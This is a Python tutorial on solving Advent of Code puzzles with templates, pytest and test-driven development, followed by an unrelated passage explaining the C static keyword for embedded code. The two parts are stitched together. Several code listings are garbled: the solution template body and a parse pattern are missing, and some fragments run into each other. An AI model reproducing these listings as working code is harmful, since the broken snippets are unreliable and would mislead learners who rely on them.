Once you have this solution in place, you can copy your personalized input data into the numbers list and calculate your answer to the puzzle. Note: There are more efficient ways of calculating this answer than trying all possibilities. However, it’s usually a good idea to start with a basic approach. Joe Armstrong is quoted as saying: Make it work, then make it beautiful, then if you really, really have to, make it fast. 90 percent of the time, if you make it beautiful, it will already be fast. So really, just make it beautiful! (Source) — Joe Armstrong Now that you’ve seen a working solution for this puzzle, can you make it beautiful? As you’re working through more puzzles, you might start feeling that copying your data into your code and rewriting it into valid Python gets tiresome. Similarly, adding a few functions to your code gives you more flexibility later. You could use them to add tests to your code, for example. Python has many powerful features for parsing strings. In the long run, you’ll be better off leaving the input data just as you downloaded them and let Python parse them into a usable data structure. In fact, dividing your code into two functions is often beneficial. One function will parse the string input and the other will solve the puzzle. Based on these principles, you can rewrite your code: 1# aoc202001.py 2 3import pathlib 4import sys 5 6def parse(puzzle_input): 7 """Parse input""" 8 return [int(line) for line in puzzle_input.split()] 9 10def part1(numbers): 11 """Solve part 1""" 12 for num1 in numbers: 13 for num2 in numbers: 14 if num1 < num2 and num1 + num2 == 2020: 15 return num1 * num2 16 17if __name__ == "__main__": 18 for path in sys.argv[1:]: 19 print(f"\n{path}:") 20 puzzle_input = pathlib.Path(path).read_text().strip() 21 22 numbers = parse(puzzle_input) 23 print(part1(numbers)) On lines 12 to 15, you’ll recognize your solution from earlier. First of all, you’ve wrapped it in a function. This makes it easier to add automatic tests to your code later. You’ve also added a parse() function that can convert lines of strings into a list of numbers. On line 20, you use pathlib to read the contents of a file as text and strip off any blank lines at the end. Looping through sys.argv gives you all the filenames entered at the command line. These changes give you more flexibility as you’re working on your solution. Say that you’ve stored the example data in a file called example.txt and your personalized input data in a file named input.txt. You can then run your solution on any one of them, or even both, by supplying their names on the command line: $ python aoc202001.py example.txt input.txt example.txt: 514579 input.txt: 744475 514579 is indeed the answer to the problem when using the example input data. Remember, the solution for your personalized input data will be different from the one shown above. Now it’s time to give the Advent of Code website a spin! Go to the 2020 Advent of Code calendar and find the puzzle for Day 1. If you haven’t already, download your input data and calculate your solution to the puzzle. Then, enter your solution on the website and click Submit. Congratulations! You’ve just earned your first star! A Starting Template As you’ve seen above, Advent of Code puzzles follow a set structure. Therefore, it makes sense to create a template for yourself that you can use as a starting point when you start to code up a solution. Exactly how much structure you want in such a template is a matter of personal taste. 
To get started, you’ll explore one example of a template that’s based on the principles you saw in the previous section: 1# aoc_template)) The template has separate functions for parsing the input as well as for solving both parts of a puzzle. You don’t need to touch lines 15 to 27 at all. They take care of reading text from an input file, calling parse(), part1(), and part2(), and then report the solutions to the console. You can create a similar template for testing your solutions. Note: As mentioned earlier, the example data are useful for creating tests, as they represent known data with corresponding solutions. The following template uses pytest as a test runner. It’s prepared for three different tests, one each for the functions parse(), part1(), and part2(): 1# test_aoc_template.py 2 3import pathlib 4import pytest 5import aoc_template@pytest.mark.skip(reason="Not implemented") 20def test_parse_example1(example1): 21 """Test that input is parsed properly""" 22 assert example1 == ... 23 24@pytest.mark.skip(reason="Not implemented") 25def test_part1_example1(example1): 26 """Test part 1 on example input""" 27 assert aoc.part1(example1) == ... 28 29@pytest.mark.skip(reason="Not implemented") 30def test_part2_example2(example2): 31 """Test part 2 on example input""" 32 assert aoc.part2(example2) == ... You’ll see an example of how you can use this template later. Until then, there are a few things you should note: - As indicated on line 1, you should name your pytestfiles with a test_prefix. - Similarly, each test is implemented in a function named with a test_prefix. You can see examples of these on lines 20, 25, and 30. - You should change the import on line 5 to import your solution code. - The template assumes that the example data are stored in files named example1.txtand example2.txt. - You should remove the skip marks on lines 19, 24, and 29 when you’re ready to start testing. - You’ll need to fill in the ellipses ( ...) on lines 22, 27, and 32 according to the example data and the corresponding solutions. For example, if you were to adapt this template to the rewritten solution of the first part of the Day 1, 2020 puzzle from the previous section, then you’d need to create a file example1.txt with the following contents: 1721 979 366 299 675 1456 Next, you’d remove the skip marks for the first two tests and implement them as follows: def test_parse_example1(example1): """Test that input is parsed properly""" assert example1 == [1721, 979, 366, 299, 675, 1456] def test_part1_example1(example1): """Test part 1 on example input""" assert aoc.part1(example1) == 514579 Finally, you’d need to make sure that you’re importing your solution. If you used the filename aoc202001.py, then you should change line 5 to import aoc202001: You would then run pytest to check your solution. If you implemented your solution correctly, then you’d see something like this: $ pytest ====================== test session starts ===================== collected 3 items test_aoc202001.py ..s [100%] ================= 2 passed, 1 skipped in 0.02s ================= Note the two dots ( ..) in front of the s. They represent two tests that passed. If the tests had failed, you’d see F instead of each dot, along with a detailed explanation of what went wrong. Tools like Cookiecutter and Copier make it easier to work with templates like these. 
If you install Copier, then you can use a template similar to the one you’ve seen here by running the following command: $ copier gh:gahjelle/template-aoc-python advent_of_code This will set up the template for one particular puzzle in a subdirectory of the advent_of_code directory on your computer. Solution Strategies Advent of Code puzzles are very diverse. As you advance through the calendar, you’ll solve many different problems and discover many different strategies for approaching them. Some of these strategies are quite general and can be applied to any puzzle. If you find that you’re stuck on a puzzle, here are some things you can try to get unstuck: - Re-read the description. Advent of Code puzzles are typically very well specified, but some of them can be quite information heavy. Make sure you’re not missing a vital part of the puzzle. - Use the example data actively. Make sure you understand how those results are achieved, and check that your code is able to reproduce those examples. - Some puzzles may get a bit involved. Break the problem into smaller steps, and implement and test each step individually. - If your code works for the example data but not for your personalized input data, then you can build additional test cases based on numbers you’re able to calculate by hand to see whether your code covers all corner cases. - If you’re still stuck, then reach out to your friends and other puzzle solvers on some of the forums dedicated to Advent of Code and ask for hints about how they’ve solved the puzzle. As you do more and more puzzles, you’ll start to recognize some general kinds of puzzles that come up again and again. Some puzzles deal with text and passwords. Python has several powerful tools for manipulating text strings, including many string methods. To read and parse strings, it’s helpful to know the basics of regular expressions. However, you can often get very far with the third-party parse library as well. For example, say that you have the string "shiny gold bags contain 2 dark red bags." and want to parse the relevant information from it. You can use parse and its pattern syntax: >>> import parse >>>>>>> match = parse.search(pattern, string) >>> match.named {'outer_color': 'shiny gold', 'num': 2, 'inner_color': 'dark red'} In the background, parse builds a regular expression, but you use a simpler syntax similar to the one that f-strings use. In some of these text problems, you’re explicitly asked to work with code and parsers, often building a small custom assembly language. After parsing the code, you often need to run the given program. In practice, this means that you build a small state machine that can track its current state, including the contents of its memory. You can use classes to keep state together with behavior. In Python, data classes are great for quickly setting up a state machine. 
The following example shows the implementation of a small state machine that can handle two different instructions: 1from dataclasses import dataclass 2 3@dataclass 4class StateMachine: 5 memory: dict[str, int] 6 program: list[str] 7 8 def run(self): 9 """Run the program""" 10 current_line = 0 11 while current_line < len(self.program): 12 instruction = self.program[current_line] 13 14 # Set a register to a value 15 if instruction.startswith("set "): 16 register, value = instruction[4], int(instruction[6:]) 17 self.memory[register] = value 18 19 # Increase the value in a register by 1 20 elif instruction.startswith("inc "): 21 register = instruction[4] 22 self.memory[register] += 1 23 24 # Move the line pointer 25 current_line += 1 The two instructions set and inc are parsed and handled within .run(). Note that the type hints on lines 5 and 6 use a newer syntax that only works on Python 3.9 and later versions. If you’re using an older version of Python, then you can import Dict and List from typing instead. To run your state machine, you first initialize it with an initial memory and load the program into the machine. Next, you call .run(). When the program is done, you can inspect .memory to see the new state of your machine: >>> state_machine = StateMachine( ... memory={"g": 0}, program=["set g 44", "inc g"] ... ) >>> state_machine.run() >>> state_machine.memory {'g': 45} This program first set g to the value of 44, then increased it, leaving it at its final value of 45. Some fun puzzles involve grids and labyrinths. If your grid has a fixed size, then you can use NumPy to get an effective representation of it. Labyrinths are often useful to visualize. You can use Colorama to draw directly in your terminal: import numpy as np from colorama import Cursor grid = np.array( [ [1, 1, 1, 1, 1], [1, 0, 0, 0, 1], [1, 1, 1, 0, 1], [1, 0, 0, 2, 1], [1, 1, 1, 1, 1], ] ) num_rows, num_cols = grid.shape for row in range(num_rows): for col in range(num_cols): symbol = " #o"[grid[row, col]] print(f"{Cursor.POS(col + 1, row + 2)}{symbol}") This script shows an example of storing a grid using a NumPy array and then using Cursor.POS from Colorama to position the cursor in the terminal to print out the grid. When you run this script, you’ll see an output like the following: ##### # # ### # # o# ##### Visualizing your code as it runs can be fun and also give you some good insights. It can also be an invaluable help when you’re debugging and don’t quite understand what’s happening. So far in the tutorial, you’ve gotten some general tips on how you can work with Advent of Code puzzles. In the next sections, you’ll get more explicit and solve two puzzles from earlier years. Practicing Advent of Code: Day 1, 2019 The first puzzle you’ll attempt to solve on your own is Day 1, 2019, called The Tyranny of the Rocket Equation. This is a typical Day 1 puzzle in that the solution isn’t very involved. It’s a great exercise to get used to how Advent of Code works and to check that your environment is properly set up. Part 1: Puzzle Description In the 2019 storyline, you’re rescuing Santa, who’s become stranded at the edge of the solar system. In the first puzzle, you’re getting your rocket ready for launch:. The example data look like. You need to calculate the total fuel requirements for your spacecraft:? Now it’s time to try to solve the puzzle on your own! It’s probably the most fun to download your personalized input data and check your solution on Advent of Code so that you can earn your stars. 
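For example, on Python 3.8 the start of the class definition could look like this minimal sketch, with the body of .run() unchanged from the listing above:

from dataclasses import dataclass
from typing import Dict, List

@dataclass
class StateMachine:
    # typing.Dict and typing.List work on older Python versions,
    # unlike the built-in dict[str, int] and list[str] generics.
    memory: Dict[str, int]
    program: List[str]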
However, feel free to solve the puzzle based on the example data provided above if you’re not ready to sign in to Advent of Code yet. Part 1: Solution Once you’re done with the puzzle and you’ve earned your star, you can expand the collapsed block to see a discussion of the puzzle solution: This solution discussion is a bit more involved than what’s necessary for the puzzle. The goal is that you’ll explore some extra detail in this first solution so that you’ll be even better prepared for the next puzzles. This section is split into two parts: - A short discussion of integer division and how that can help. - A straightforward solution to the puzzle. Then, in the next section, you’ll see another solution that uses the templates for solutions and tests that you’ve seen earlier. To return to the current puzzle, take a second look at the calculation you’re asked to perform: [To] find the fuel required for a module, take its mass, divide by three, round down, and subtract 2. You can carry out these steps one after another: >>> mass = 14 >>> mass / 3 4.666666666666667 >>> int(mass / 3) 4 >>> int(mass / 3) - 2 2 For positive numbers, you can use int() to round down. If your numbers may be negative, then you should use math.floor() instead. Python, and many other programming languages, have support for dividing and rounding down in one step. This is called integer division and is done with the integer division operator ( //). You can then rewrite your previous calculation: >>> mass = 14 >>> mass // 3 4 >>> mass // 3 - 2 2 Using mass // 3 divides by three and rounds down in one step. You can now calculate the fuel for each mass and add them together to solve the puzzle: >>> masses = [12, 14, 1969, 100756] >>> total_fuel = 0 >>> for mass in masses: ... total_fuel += mass // 3 - 2 ... >>> total_fuel 34241 The four example modules need a total of 34241 fuel units. In the puzzle description, they’re listed as requiring 2, 2, 654, and 33583 fuel units, respectively. Adding these up, you get 34241, which confirms your calculations. You can replace the numbers in the masses list with your personalized input data to get your own answer to the puzzle. If you’re familiar with comprehensions and generator expressions, then you can use sum() to shorten your code: >>> masses = [12, 14, 1969, 100756] >>> sum(mass // 3 - 2 for mass in masses) 34241 With sum(), you don’t need to manually add up each fuel requirement. Instead, you can solve the current puzzle in one line of code. You’ve now solved the first part of the puzzle. However, before moving on to the second part of the puzzle, the next section shows how you can use the templates you saw earlier when solving this problem. Part 1: Solution Using Templates Expand the collapsed block below to see another solution to the first part of the Advent of Code puzzle for Day 1, 2019—this time using the templates you saw earlier to organize your code and simplify testing: If you’re going to do several Advent of Code puzzles, then it’s a good idea to organize your solutions into folders. This allows you to keep all the files related to a puzzle together. One nice way of keeping things tidy is to have one folder for each year of Advent of Code and to have folders for each day within each year’s folder. 
For this puzzle, you might set up something like this:

advent_of_code/
│
└── 2019/
    └── 01_the_tyranny_of_the_rocket_equation/
        ├── aoc201901.py
        ├── input.txt
        ├── example1.txt
        └── test_aoc201901.py

You store your personalized input data in input.txt, while example1.txt contains the example data from the puzzle description, one module mass per line:

12
14
1969
100756

You can then use these data to set up your first tests. Start with the test template from earlier, and fill in tests for parsing input and for solving part one:

 1 # test_aoc201901.py
 2
 3 import pathlib
 4 import pytest
 5 import aoc201901 as aoc
 6
 7 PUZZLE_DIR = pathlib.Path(__file__).parent
 8
 9 @pytest.fixture
10 def example1():
11     puzzle_input = (PUZZLE_DIR / "example1.txt").read_text().strip()
12     return aoc.parse(puzzle_input)
13
14 @pytest.fixture
15 def example2():
16     puzzle_input = (PUZZLE_DIR / "example2.txt").read_text().strip()
17     return aoc.parse(puzzle_input)
18
19 def test_parse_example1(example1):
20     """Test that input is parsed properly"""
21     assert example1 == [12, 14, 1969, 100756]
22
23 def test_part1_example1(example1):
24     """Test part 1 on example input"""
25     assert aoc.part1(example1) == 2 + 2 + 654 + 33583
26
27 @pytest.mark.skip(reason="Not implemented")
28 def test_part2_example2(example2):
29     """Test part 2 on example input"""
30     assert aoc.part2(example2) == ...

You want the parser to read the text file and convert each line to a number in a list. You specify this on line 21 as the expected value in test_parse_example1(). The expected value for test_part1_example1() is the sum of the four fuel requirements mentioned in the text.

Finally, add aoc201901.py based on the solution template:

# aoc201901.py
import pathlib
import sys

def parse(puzzle_input):
    """Parse input"""

def part1(data):
    """Solve part 1"""

def part2(data):
    """Solve part 2"""

def solve(puzzle_input):
    """Solve the puzzle for the given input"""
    data = parse(puzzle_input)
    solution1 = part1(data)
    solution2 = part2(data)
    return solution1, solution2

if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(f"\n{path}:")
        solutions = solve(pathlib.Path(path).read_text().strip())
        print("\n".join(str(solution) for solution in solutions))

Before you start adding your solution to the template, take a minute to run pytest to confirm that the tests are indeed failing. In between a lot of details, you should get something like this:

$ pytest test_aoc201901.py
FFs                                                         [100%]
===================== short test summary info =====================
FAILED test_parse_example1 - assert None == [12, 14, 1969, 100756]
FAILED test_part1_example1 - assert None == (((2 + 2) + 654) + 33583)
================== 2 failed, 1 skipped in 0.09s ===================

Note that you have two tests that are failing, just as expected. This way of working is known as test-driven development (TDD). You first write your tests and make sure they fail. Afterward, you implement the code necessary to make them pass. This may seem like overkill for this puzzle but can be a very useful habit for more challenging problems.

It’s time to add your solution to aoc201901.py. First, parse the input data. They are delivered to parse() as a text string of numbers separated by newlines (\n) and should be converted into a list of integers:

def parse(puzzle_input):
    """Parse input"""
    return [int(line) for line in puzzle_input.split("\n")]

The list comprehension converts each line to an integer and collects them all into a list. Run pytest again and confirm that your first test, test_parse_example1(), no longer fails. Next, add your solution to the puzzle:

def part1(data):
    """Solve part 1"""
    return sum(mass // 3 - 2 for mass in data)

You’re solving part one by using sum() as discussed in the previous section. Confirm that your solution is correct by running pytest one more time:

$ pytest test_aoc201901.py
..s                                                         [100%]
================== 2 passed, 1 skipped in 0.01s ===================

With the tests passing, you can solve the puzzle for your personalized input data by running the program against input.txt:

$ python aoc201901.py input.txt
input.txt:
3550236
None

Your own answer will be different from what’s shown here, 3550236. The None output at the bottom represents the solution to the second part, which you haven’t implemented yet. Now might be a good time to look at part two! You can now move on to the second part of the puzzle. Are you ready for the twist?
Part 2: Puzzle Description

Every Advent of Code puzzle consists of two parts, where the second part is revealed only after you solve the first part. The second part is always related to the first and will use the same input data. However, you may often need to rethink your approach to the first half of the puzzle in order to account for the second half. Expand the collapsed block below to have a look at the second part of the Advent of Code puzzle for Day 1, 2019:

Your quest to get the rocket off the ground continues. Of course, adding all that fuel to your spacecraft has made it heavier. You need to add more fuel to account for the added weight, but that fuel will also need to be accounted for. To see how this works in practice, have a look at the examples: So, for each module mass, calculate its fuel and add it to the total. Then, treat the fuel amount you just calculated as the input mass and repeat the process, continuing until a fuel requirement is zero or negative. For example:

- A module of mass 14 requires 2 fuel. This fuel requires no further fuel (2 divided by 3 and rounded down is 0, which would call for a negative fuel), so the total fuel required is still just 2.
- At first, a module of mass 1969 requires 654 fuel. Then, this fuel requires 216 more fuel (654 / 3 - 2). 216 then requires 70 more fuel, which requires 21 fuel, which requires 5 fuel, which requires no further fuel. So, the total fuel required for a module of mass 1969 is 654 + 216 + 70 + 21 + 5 = 966.
- The fuel required by a module of mass 100756 and its fuel is: 33583 + 11192 + 3728 + 1240 + 411 + 135 + 43 + 12 + 2 = 50346.

The examples are still using the same numbers as for part one. The fuel needed for the module with mass 12 isn’t specified, but you can calculate that it will be 2 using the same calculation as for the module with mass 14. The question you need to answer remains the same: What is the sum of the fuel requirements for all of the modules on your spacecraft when also taking into account the mass of the added fuel? (Calculate the fuel requirements for each module separately, then add them all up at the end.)

Have a go at solving this part as well. Can you earn your second star? You’ll see a possible solution to part two in the next section. However, try to solve the puzzle for yourself first. If you need a hint to get started, then expand the box below:

Repeated calculations like the ones in this part of the puzzle often lend themselves well to recursion.

How did you do? Is your rocket ready for launch?

Part 2: Solution

This section shows how you can solve part two, continuing with the template you saw above:

Continuing with the test-driven development workflow, start with adding the new examples to your test file. The examples are using the same numbers as part one, so you can use the same example1.txt file. You can therefore remove the example2() fixture from your test code. Next, remove the skip mark and then rename and implement test_part2_example1():

def test_part2_example1(example1):
    """Test part 2 on example input"""
    assert aoc.part2(example1) == 2 + 2 + 966 + 50346

As before, run pytest to confirm that your test is failing.

Note: pytest has a nice option, -k, that you can use to only run a subset of your tests. With -k you can filter on the test names. For example, to only run the tests related to part two, you can use pytest -k part2. This is also a nice incentive to use consistent and descriptive test names.

Next, it’s time for the actual implementation.
Repeated calculations of fuel like you’re asked for here can be handled well using recursion. A recursive function is a function that calls itself. When implementing a recursive function, you should be conscious of including a stopping condition: When should the function stop calling itself? In this example, the stopping condition is mentioned quite explicitly in the puzzle description. You should stop when the fuel becomes zero or negative. Add the following as a new function in your aoc201901.py solution file: 1def all_fuel(mass): 2 """Calculate fuel while taking mass of the fuel into account""" 3 fuel = mass // 3 - 2 4 if fuel <= 0: 5 return 0 6 else: 7 return fuel + all_fuel(mass=fuel) Line 4 implements the stopping condition, while line 7 does the recursive call. You can add a test to check that the calculation works as expected. Note that if you’d been doing pure test-driven development, then you’d have added the test first. Add this function to your test file: def test_all_fuel(): """Test that fuel can be calculated recursively""" assert aoc.all_fuel(1969) == 966 In this test, you don’t use the input files. Instead, you check directly one of the examples given above. Before moving on to solve the whole puzzle, note that you can use the walrus operator to write the function more concisely: def all_fuel(mass): """Calculate fuel while taking mass of the fuel into account""" return 0 if (fuel := mass // 3 - 2) < 0 else fuel + all_fuel(fuel) While the code is shorter, it’s also denser. Whether you find that the end result is more readable or not is a matter of taste and experience. To finish off the puzzle, you also need to implement part2(). Your all_fuel() function calculates the fuel needed for each module, so what’s left is adding the fuel for all modules together: def part2(data): """Solve part 2""" return sum(all_fuel(mass) for mass in data) The implementation of part2() ends up being quite similar to part1(). You only need to change the fuel calculation for each mass. To finish up, run pytest to confirm that everything works. Then run your program on your input to get your final puzzle answer: $ python aoc201901.py input.txt input.txt: 3550236 5322455 Back at the Advent of Code website, enter your own answer, which will be different from the one above. Your second star is waiting! Before leaving this puzzle completely, note that it’s possible to solve the second part without using recursion. You could do the same calculations using loops instead. Here’s one possible implementation: def part2(data): """Solve part 2""" total_fuel = 0 for mass in data: while (mass := mass // 3 - 2) > 0: total_fuel += mass return total_fuel For each mass, the while loop calculates all the fuel needed and adds it to the running total fuel count. One of the fun things about challenging yourself with programming puzzles is that they give you a great opportunity to try out different solutions to problems and compare them. Congratulations! You’ve now solved an entire Advent of Code puzzle. Are you ready for a more challenging one? Practicing Advent of Code: Day 5, 2020 The second puzzle you’ll attempt to solve is the one for Day 5, 2020, called Binary Boarding. This puzzle is a bit more challenging than the previous one, but the final solution won’t require a lot of code. Start by having a look at the puzzle description for part one. Part 1: Puzzle Description In 2020, you’re trying hard to get to your well-deserved vacation spot. 
On Day 5, you’re about to board your plane when trouble ensues: You board your plane only to discover a new problem: you dropped your boarding pass! You aren’t sure which seat is yours, and all of the flight attendants are busy with the flood of people that suddenly made it through passport control. You write a quick program to use your phone’s camera to scan all of the nearby boarding passes (your puzzle input); perhaps you can find your seat through process of elimination.

Instead of zones or groups, this airline uses binary space partitioning to seat people. A seat might be specified like FBFBBFFRLR, where F means “front”, B means “back”, L means “left”, and R means “right”.

The first 7 characters will either be F or B; these specify exactly one of the 128 rows on the plane (numbered 0 through 127). Each letter tells you which half of a region the given seat is in. Start with the whole list of rows; the first letter indicates whether the seat is in the front (0 through 63) or the back (64 through 127). The next letter indicates which half of that region the seat is in, and so on until you’re left with exactly one row. For example, consider just the first seven characters of FBFBBFFRLR:

- Start by considering the whole range, rows 0 through 127.
- F means to take the lower half, keeping rows 0 through 63.
- B means to take the upper half, keeping rows 32 through 63.
- F means to take the lower half, keeping rows 32 through 47.
- B means to take the upper half, keeping rows 40 through 47.
- B keeps rows 44 through 47.
- F keeps rows 44 through 45.
- The final F keeps the lower of the two, row 44.

The last three characters will be either L or R; these specify exactly one of the 8 columns of seats on the plane (numbered 0 through 7). The same process as above proceeds again, this time with only three steps. L means to keep the lower half, while R means to keep the upper half. For example, consider just the last 3 characters of FBFBBFFRLR:

- Start by considering the whole range, columns 0 through 7.
- R means to take the upper half, keeping columns 4 through 7.
- L means to take the lower half, keeping columns 4 through 5.
- The final R keeps the upper of the two, column 5.

So, decoding FBFBBFFRLR reveals that it is the seat at row 44, column 5. Every seat also has a unique seat ID: multiply the row by 8, then add the column. In this example, the seat has ID 44 * 8 + 5 = 357. Here are some other boarding passes:

- BFFFBBFRRR: row 70, column 7, seat ID 567.
- FFFBBBFRRR: row 14, column 7, seat ID 119.
- BBFFBBFRLL: row 102, column 4, seat ID 820.

As a sanity check, look through your list of boarding passes. What is the highest seat ID on a boarding pass?

There’s a lot of information in this puzzle description! However, most of it concerns how binary space partitioning works for this particular airline. Now, try to solve the puzzle for yourself! Keep in mind that if you consider it from the right perspective, the conversion from a boarding pass specification to a seat ID isn’t as complicated as it might seem at first. If you find that you’re struggling with that part, then expand the box below to see a hint on how you can get started.

The boarding pass specifications are based on the binary system, just camouflaged with different characters. Can you translate the boarding passes into binary numbers?

When you’re done with your solution, have a look in the next section to see a discussion about the puzzle.
Part 1: Solution

Now that you’ve given it a shot yourself, you can go ahead and expand the following block to see one way the puzzle can be solved:

You can implement the calculation of the seat IDs based on the description in the text. The following function takes the same steps as the example:

def decode(string):
    """Decode a boarding pass string into a number"""
    start, end = 0, 2 ** len(string)
    for char in string:
        if char in {"F", "L"}:
            end -= (end - start) // 2
        elif char in {"B", "R"}:
            start += (end - start) // 2
    return start

You limit the range of possible rows or columns by start and end. While start is included in the range, end is not. This makes the math easier as it keeps the difference of end - start divisible by two throughout the calculation. You lower the upper limit for each F or L, and you increase start, the lower limit, for each B or R. You can check that the function gives the same results as the examples:

>>> decode("FBFBBFF")
44
>>> decode("RLR")
5
>>> decode("FBFBBFFRLR")
357

Using decode(), you can calculate the row, the column, and the seat ID for a boarding pass. However, Python already has built-in tools to carry out the same calculation for you. The name of the puzzle, Binary Boarding, and the mention of binary space partitioning are meant to start you thinking about (or reading about) the binary system. Binary is a number system composed of two digits, 0 and 1, instead of the traditional ten digits. In the puzzle, the boarding pass specifications are really binary numbers. The difference is that they use F or L in place of 0, and B or R in place of 1. For example, FBFBBFFRLR can be translated to the binary number 0101100101. You can use Python to convert this to a regular decimal number:

>>> int("0101100101", base=2)
357

Do you recognize that answer? 357 is indeed the seat ID of FBFBBFFRLR. In other words, in order to calculate seat IDs, you need to translate F, L, B, R into their respective binary digits. There are several ways you can do this, but str.translate() in Python’s standard library is probably the most convenient. Here’s how it works:

>>> mapping = str.maketrans({"F": "0", "L": "0", "B": "1", "R": "1"})
>>> "FBFBBFFRLR".translate(mapping)
'0101100101'

The .translate() method uses character codes like 70 instead of strings like "F". You can set up the translation based on strings, though, with the convenience function str.maketrans(). You can now use these tools to solve the puzzle in three steps:

- Convert boarding pass specifications to binary numbers.
- Calculate the decimal value of the binary numbers to get the seat IDs.
- Find the maximal seat ID.

Set up your templates for the new puzzle, with input.txt containing your personalized puzzle input:

advent_of_code/
│
└── 2020/
    └── 05_binary_boarding/
        ├── aoc202005.py
        ├── input.txt
        ├── example1.txt
        └── test_aoc202005.py

You can add the worked examples to example1.txt as usual:

FBFBBFFRLR
BFFFBBFRRR
FFFBBBFRRR
BBFFBBFRLL

Next, you’re going to prepare the tests for the first part. Before doing so, you should think about how you want to parse the puzzle input. One option is to parse the input file into a list of strings. However, you can also think about the conversion from boarding pass specification to seat ID as part of the parsing process. One consideration to take into account is whether you think you’ll need the original boarding pass strings later—that is, in part two. You decide to take the chance, and you parse the seat IDs immediately.
If the boarding pass strings are needed in part two, then you can always go back and refactor your code. Add the following tests to your test file:

def test_parse_example1(example1):
    """Test that input is parsed properly"""
    assert example1 == [357, 567, 119, 820]

def test_part1_example1(example1):
    """Test part 1 on example input"""
    assert aoc.part1(example1) == 820

As usual, run pytest to confirm that your tests are failing. Then it’s time to start implementing your solution. Start with the parsing:

BP2BINARY = str.maketrans({"F": "0", "B": "1", "L": "0", "R": "1"})

def parse(puzzle_input):
    """Parse input"""
    return [
        int(bp.translate(BP2BINARY), base=2)
        for bp in puzzle_input.split("\n")
    ]

You set up the translation table between boarding pass strings and binary numbers. Then you use .translate() to translate each boarding pass in your input to a binary number and int() to convert the binary number to a seat ID. Finding the highest seat ID is now straightforward:

def part1(data):
    """Solve part 1"""
    return max(data)

Python’s built-in max() finds the highest value in a list. You can now run your tests to confirm that your solution works and then run your code against your personalized input to get your answer to the puzzle. Time to move on to the second part of the puzzle. Will you be able to board the plane?

Part 2: Puzzle Description

Expand the section below when you’re ready for the second part of the puzzle:

Compared to the first part, the description of part two is quite short and concise: Ding! The “fasten seat belt” signs have turned on. Time to find your seat. What is the ID of your seat?

Can you find your seat? Take your time and work on your solution to this second part.

Part 2: Solution

Open the box below when you’re ready to compare your solution to another one:

In this second part of the puzzle, you’re looking for one missing number in a list of numbers. There are several ways you can approach this. You can, for example, sort all the numbers and compare consecutive items in your sorted list. Another option is to use Python’s powerful sets. You can first create the full set of valid seat IDs. Then you can calculate the set difference between this full set and the set of seat IDs on your list. Before you start on the implementation, though, you should add a test for it. In this case, the example data are actually not good to use for a test. They have many seat IDs missing, not only one as the puzzle text specifies. You’re better off creating a small test manually. Here’s one way you can do it:

def test_part2():
    """Test part 2 on example input"""
    data = [3, 9, 4, 8, 5, 10, 7, 11]
    assert aoc.part2(data) == 6

The list [3, 9, 4, 8, 5, 10, 7, 11] contains all seat IDs from 3 to 11 with the exception of 6. This smaller example fulfills the conditions of the puzzle. Your solution should therefore be able to pick out the missing seat ID. In this implementation, you’ll use the set() approach:

1 def part2(data):
2     """Solve part 2"""
3     all_ids = set(range(min(data), max(data) + 1))
4     return (all_ids - set(data)).pop()

On line 3, you create all the valid seat IDs. These are the numbers between the smallest seat ID and highest seat ID in your dataset, inclusive. To find your seat ID, you convert your list of seat IDs to a set, compare it to the set of all IDs, and pop out the one remaining seat ID.

Congratulations! By now, you’ve solved at least two Advent of Code puzzles. Luckily, there are hundreds more waiting for you!

Conclusion

Advent of Code is a great resource of fun programming puzzles!
You can use it to practice your problem-solving skills and challenge your friends to a fun competition and common learning experience. If you haven’t already done so, then head over to the Advent of Code website and try out some of the new puzzles. In this tutorial, you learned: - How solving puzzles can advance your programming skills - How you can participate in Advent of Code - How you can approach different kinds of puzzles - How you can organize your code and tests when solving Advent of Code puzzles - How test-driven development can be used when solving puzzles Real Python hosts a private leaderboard and a community forum about Advent of Code. Become a Real Python member and join the #advent-of-code Slack channel to access it.
https://statsidea.com/advent-of-code-solving-your-puzzles-with-python/
CC-MAIN-2022-40
en
refinedweb
The static keyword in the C language is very simple, so simple that you could write a whole project without ever using it. This chapter is mainly about my understanding and application of static. Of course, at the beginning of the chapter, I still need to briefly describe the static keyword according to the book.

1. Brief description

The static keyword is very simple in embedded C. It has three functions:

Function 1: in a function body, a variable declared as static keeps its value from one call of the function to the next.

void test1(void)
{
    unsigned char a;
    static unsigned char b;
    …
    a++;
    b++;
}

In this example, variable a is a local variable and variable b is a local static variable. Function 1 describes the characteristic of the local static variable b: in the function body, a variable declared as static (that is, a local static variable) keeps its value between calls of the function. In this respect, the effect is the same as that of a global variable. In the following simple example, a local variable of the function is declared static and used as a counter, so that the calls to the function can be counted. This way of counting is robust, because other functions cannot modify the counter (short of the program running wild):

#include <stdio.h>

void count();

int main()
{
    int i;
    for (i = 1; i <= 3; i++)
    {
        count();
    }
    return 0;
}

void count()
{
    static int num = 0;
    num++;
    printf("I have been called %d times\n", num);
}

The output result is:
I have been called 1 times.
I have been called 2 times.
I have been called 3 times.

Here are two points to note:

- The scope of the local static variable is unchanged; it is still only valid inside the function.
- The storage location of a local static variable is static storage; it is no longer stored on the stack.

If you are unsure about the storage of local static variables, see the previous chapter, 《Memory allocation of C language in stm32》.

Function 2: in the module (but outside any function), a variable declared as static can be accessed by the functions in that module, but cannot be accessed by functions outside the module. It is a module-local global variable. Variables defined in this way are also called global static variables: add the keyword static in front of a global variable, and that global variable becomes a global static variable. That is, it is the kind of static variable declared in the module (but outside any function) mentioned in Function 2 above.

Benefits of defining global static variables:
- Its scope is limited to this file, so it will not be accessed or modified by other files; it behaves like a file-local variable.
- Variables with the same name can be used in other files without conflict.

Function 3: in a module, a function declared as static can only be called by other functions in this module. That is, the function is restricted to the local scope of the module that declares it. A function defined in this way is called a static function: add the keyword static before the return type of the function, and the function is defined as a static function.

Benefits of defining static functions:
- Functions with the same name can be defined in other files without conflict.
- Static functions cannot be used by other files; they define a local function.

2. Talk more

As mentioned above, the static keyword is very simple, and it is basically there for code modularization. For quite a period of time, I didn't use the static keyword in my work. In MCU code, one person can generally manage the whole code project, so I didn't use the static keyword a lot.
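To make Function 2 and Function 3 above concrete, here is a minimal sketch of my own (the file and symbol names are made up for illustration and are not from the original article):

/* counter_module.c */
#include <stdio.h>

/* Function 2: file-scope static variable, visible only inside this .c file */
static unsigned int call_count = 0;

/* Function 3: static function, callable only from inside this .c file */
static void log_call(void)
{
    printf("called %u times\n", call_count);
}

/* The one public entry point that other files may call (declared in a header) */
void module_do_work(void)
{
    call_count++;
    log_call();
}

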